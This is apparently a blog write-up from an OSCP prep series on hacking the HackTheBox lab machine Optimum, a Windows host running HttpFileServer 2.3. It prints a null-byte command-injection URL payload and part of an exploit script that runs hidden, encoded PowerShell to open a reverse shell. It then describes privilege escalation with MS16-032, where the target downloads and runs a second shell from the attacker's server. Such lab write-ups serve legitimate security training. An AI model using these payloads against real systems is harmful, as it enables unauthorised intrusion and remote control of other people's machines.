TJnull OSCP Prep Series
HackTheBox: Optimum [OSCP Prep]

HackTheBox: Optimum [OSCP Prep]


  • OS: Windows 💠
  • Difficulty: Easy 😇
  • Release: 18 Mar 2017 📅
  • IP: 10.10.10.8 💻
  • Box Creator: ch4p 😎

Hello there guys. Welcome to my 8th post on the TJnull OSCP Prep Series. Today we’re going to be discussing Optimum from HackTheBox.

Let’s begin with a full Nmap scan port scan to see what open ports we can find. I’ve used Rustscan because it provides faster Nmap results:

$ rustscan -a 10.10.10.8 -r 1-65535 -- -sV -sC -Pn
PORT   STATE SERVICE REASON  VERSION
80/tcp open  http    syn-ack HttpFileServer httpd 2.3
|_http-favicon: Unknown favicon MD5: 759792EDD4EF8E6BC2D1877D27153CB1
| http-methods: 
|_  Supported Methods: GET HEAD POST
|_http-server-header: HFS 2.3
|_http-title: HFS /
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 18:12
Completed NSE at 18:12, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 18:12
Completed NSE at 18:12, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 18:12
Completed NSE at 18:12, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 26.44 seconds

We found HTTP port 80 open.

Figure 1.0: HFS information disclosure

We can see what software is in use and its version information.

Software: HttpFileServer 2.3

If you search for public exploits you might find this exploit. Fill in the required variables. Also, you might want to change the add absolute path of the powershell 64-bit executable to get a 64-bit shell.

lhost = "10.10.10.1"
lport = 1111
rhost = "10.10.10.8"
rport = 80

...
...

// EDIT (A 64-bit shell comes in handy later in the post exploitation stage)
payload = f'exec| C:\\Windows\SysNative\\WindowsPowerShell\\v1.0\\powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -WindowStyle Hidden -EncodedCommand {encoded_command}'

...

Exploit:

Figure 1.1

Manual Exploitation

You can also try doing this manually. With the following URL:

http://10.10.10.8/?search=%00{.exec|YOUR-COMMAND-HERE.}

The idea is to do a command injection with the use of a null byte (%00) to escape from regular expression checks. You can find more here.

Figure 1.2: Payload goes into the search parameter
Figure 1.3: Our command gets executed, the target is pulling our shell from our local server.
Figure 1.4: Got a connection

Post Exploitation

To view to system details use command systeminfo. I copied to results to a file called systeminfo.txt for later use with windows-exploit-suggester.

PS C:\Windows\TEMP> systeminfo
Host Name:                 OPTIMUM
OS Name:                   Microsoft Windows Server 2012 R2 Standard
OS Version:                6.3.9600 N/A Build 9600
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Server
OS Build Type:             Multiprocessor Free
Registered Owner:          Windows User
Registered Organization:   
Product ID:                00252-70000-00000-AA535
Original Install Date:     18/3/2017, 1:51:36 ��
System Boot Time:          2/6/2020, 3:20:50 ��
System Manufacturer:       VMware, Inc.
System Model:              VMware Virtual Platform
System Type:               x64-based PC
Processor(s):              1 Processor(s) Installed.
                           [01]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
BIOS Version:              Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             el;Greek
Input Locale:              en-us;English (United States)
Time Zone:                 (UTC+02:00) Athens, Bucharest
Total Physical Memory:     4.095 MB
Available Physical Memory: 3.475 MB
Virtual Memory: Max Size:  5.503 MB
Virtual Memory: Available: 4.929 MB
Virtual Memory: In Use:    574 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    HTB
Logon Server:              \\OPTIMUM
Hotfix(s):                 31 Hotfix(s) Installed.
                           [01]: KB2959936
                           [02]: KB2896496
                           [03]: KB2919355
                           [04]: KB2920189
                           [05]: KB2928120
                           [06]: KB2931358
                           [07]: KB2931366
                           [08]: KB2933826
                           [09]: KB2938772
                           [10]: KB2949621
                           [11]: KB2954879
                           [12]: KB2958262
                           [13]: KB2958263
                           [14]: KB2961072
                           [15]: KB2965500
                           [16]: KB2966407
                           [17]: KB2967917
                           [18]: KB2971203
                           [19]: KB2971850
                           [20]: KB2973351
                           [21]: KB2973448
                           [22]: KB2975061
                           [23]: KB2976627
                           [24]: KB2977629
                           [25]: KB2981580
                           [26]: KB2987107
                           [27]: KB2989647
                           [28]: KB2998527
                           [29]: KB3000850
                           [30]: KB3003057
                           [31]: KB3014442
Network Card(s):           1 NIC(s) Installed.
                           [01]: Intel(R) 82574L Gigabit Network Connection
                                 Connection Name: Ethernet0
                                 DHCP Enabled:    No
                                 IP address(es)
                                 [01]: 10.10.10.8
Hyper-V Requirements:      A hypervisor has been detected. Features required for Hyper-V will not be displayed.

I used windows-exploit-suggester to find potential kernel exploits that the target might be vulnerable to. I’ve already logged the output to a file named “windows-exploit-suggester-results.txt“.

$ ./windows-exploit-suggester.py --database 2019-10-05-mssb.xls --systeminfo systeminfo.txt > windows-exploit-suggester-results.txt

Figure 1.5: Grep for exploits for windows 2012

The target is vulnerable to MS16-032. Do a quick google search to find the exploit online.

Figure 1.6

Edit the reverse shell port (In my case: Invoke-PowerShellTcp.ps1) to get another session.

Figure 1.6: Invoke-PowerShellTcp.ps1 from project Nishang

Start your listener:

Figure 1.7
Figure 1.8: Get a shell

Line 1 : Download MS16-032 exploit (Invoke-MS16032.ps1) and load its functions to memory.

Line 2 : Now execute the function Invoke-MS16032 with the command you want to run. In my case, I downloaded and executed my reverse shell

Figure 1.9: Interactions with my local server.

Additional Notes:

MS16-032 exploit might not work if you’re using a 32-bit shell, so you might want to have a 64-bit PowerShell process. You can checkout my Q&A blog post Why is my windows kernel exploit not working? to learn more.


I hope you have learned something valuable by reading my write-up. If you like this post please share it with your fellow hackermates and if you have any questions & suggestions please feel free to post them down in the comments. I’d love to hear and learn from you.

If you enjoyed this write-up show me some ❤️ by giving me some respect 💯 at [email protected] which helps & motivates me to create content like this for the awesome hacking community. Have a great day guys 👋. See you in the next post.

Subscribe
Notify of
guest
0 Comments
Inline Feedbacks
View all comments